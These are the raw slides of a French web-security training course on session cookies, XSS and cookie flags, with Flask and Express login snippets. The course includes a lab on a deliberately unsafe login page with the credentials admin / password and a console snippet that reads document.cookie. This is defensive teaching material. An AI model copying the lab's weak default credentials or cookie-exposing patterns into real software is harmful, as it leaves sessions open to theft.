            <a:ext cx="4197096" cy="4050792"/>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@app.post("/api/login")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def login():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    body = request.get_json(silent=True) or {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    response = jsonify(ok=True, user=safe_user)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    response.set_cookie("session_id", session_id,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                        httponly=True, samesite="Lax", path="/")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    return response</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02 · Express</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Express, le jumeau Node</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3832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Le framework web le plus courant en Node. Une route, un cookie, un JSON.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Même lab, mêmes comptes, même port. Vous cassez les deux. Vous patcherez les deux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Une route, un cookie, un JSON. C’est tout ce qu’on lui demande ici.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5074920"/>
            <a:ext cx="6035040" cy="292608"/>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local  ·  day-1/s2_intro/node-express</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="4526280" cy="443484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537960" y="1051560"/>
            <a:ext cx="64008" cy="443484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39128" y="1124712"/>
            <a:ext cx="4251960" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s2_intro / node-express  ·  le login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6739128" y="1362456"/>
            <a:ext cx="4197096" cy="4050792"/>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app.post("/api/login", (request, response) =&gt; {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  const { username, password } = request.body || {};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  response.cookie("session_id", sessionId, {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    httpOnly: true, sameSite: "lax", path: "/",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  response.json({ ok: true, user: safeUser });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>});</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02 · XSS, un mot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="859536"/>
            <a:ext cx="10058400" cy="402336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XSS : le navigateur exécute du JS qui n’est pas le vôtre</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="133502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1005840" y="1481328"/>
            <a:ext cx="3118104" cy="306324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15568" y="1682496"/>
            <a:ext cx="2935224" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1. Donnée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="2212848"/>
            <a:ext cx="2935224" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>URL, commentaire, bio : du texte qui n'est pas le vôtre.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475988" y="1481328"/>
            <a:ext cx="3118104" cy="306324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585716" y="1682496"/>
            <a:ext cx="2935224" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2. La page mélange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585716" y="2212848"/>
            <a:ext cx="2935224" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>innerHTML, href, un template : HTML et donnée collés.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rounded Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946136" y="1481328"/>
            <a:ext cx="3118104" cy="3063240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FEF2F2"/>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055864" y="1682496"/>
            <a:ext cx="2935224" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3. Le JS s'exécute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8055864" y="2212848"/>
            <a:ext cx="2935224" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le navigateur de la victime croit que c'est le site. Il lit le token.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4681728"/>
            <a:ext cx="10058400" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ce n’est pas un virus. C’est le navigateur qui fait son travail. Tout ce que JS peut lire, un XSS le lit. Ici : le levier, avant de ranger le cookie.</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02 · rangement</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Où le navigateur range la session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>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Cookie HTTP</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navigateur le renvoie tout seul à chaque requête. JavaScript peut le lire… sauf HttpOnly.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1956815"/>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956815"/>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993391"/>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localStorage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2212848"/>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JavaScript le lit toujours. N’importe quel XSS vole le token. Aucun flag de protection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2852927"/>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852927"/>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889503"/>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Variable JS (mémoire)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="3108959"/>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Meurt avec l’onglet. Propre, inconfortable. Rarement le bon choix pour une session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="37673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Règle : un secret de session n’appartient pas à JavaScript.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6"/>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7"/>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8"/>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8"/>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A  ·  15 min</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Login hébergé, cookies, cousin</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training.dercetech.com  ·  labs/day-1/s2</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Guide  ·  training.dercetech.com/…/labs/day-1/s2/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1810512"/>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4"/>
              </a:rPr>
              <a:t>Unsafe login  ·  …/labs/day-1/s2/unsafe/  ·  admin / password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2048256"/>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5"/>
              </a:rPr>
              <a:t>Cousin  ·  training2.dercetech.com/day-1/s2/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2322576"/>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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2542032"/>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Rien à installer. Un navigateur, trois onglets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2798064"/>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admin / password sur le login unsafe. Un prénom, si on vous le demande.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="305409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Puis le cousin : même famille, autre hôte.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3364992"/>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Se connecter, lire les cookies, ouvrir le cousin. Noter ce qui traverse.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4142232"/>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05840" y="4142232"/>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325880" y="4215384"/>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Ouvrir le guide, puis le login unsafe. admin / password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4636008"/>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005840" y="4636008"/>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325880" y="4709160"/>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DevTools → Application → Cookies. Noter session, whoami, les flags.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rounded Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="512978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 y="512978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325880" y="520293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Ouvrir training2.dercetech.com/day-1/s2/. Le cousin voit-il le cookie ?</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A · à coller</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Lire le cookie, depuis la page</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Console  ·  JavaScript</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document.cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// "session=3f8a…c21; whoami=Anne"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const who = document.cookie.split("; ")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  .find(r =&gt; r.startsWith("whoami="))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  ?.split("=")[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>console.log("on te voit :", decodeURIComponent(who));</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Si JS de la page peut le lire, un script que vous n’avez pas écrit aussi.</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40080"/>
            <a:ext cx="5120640" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>02 · flags</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="932688"/>
            <a:ext cx="5120640" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Les flags qui comptent vraiment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1444752"/>
            <a:ext cx="51206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88720" y="1627632"/>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HttpOnly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="1627632"/>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JS ne lit pas le cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2048256"/>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Secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
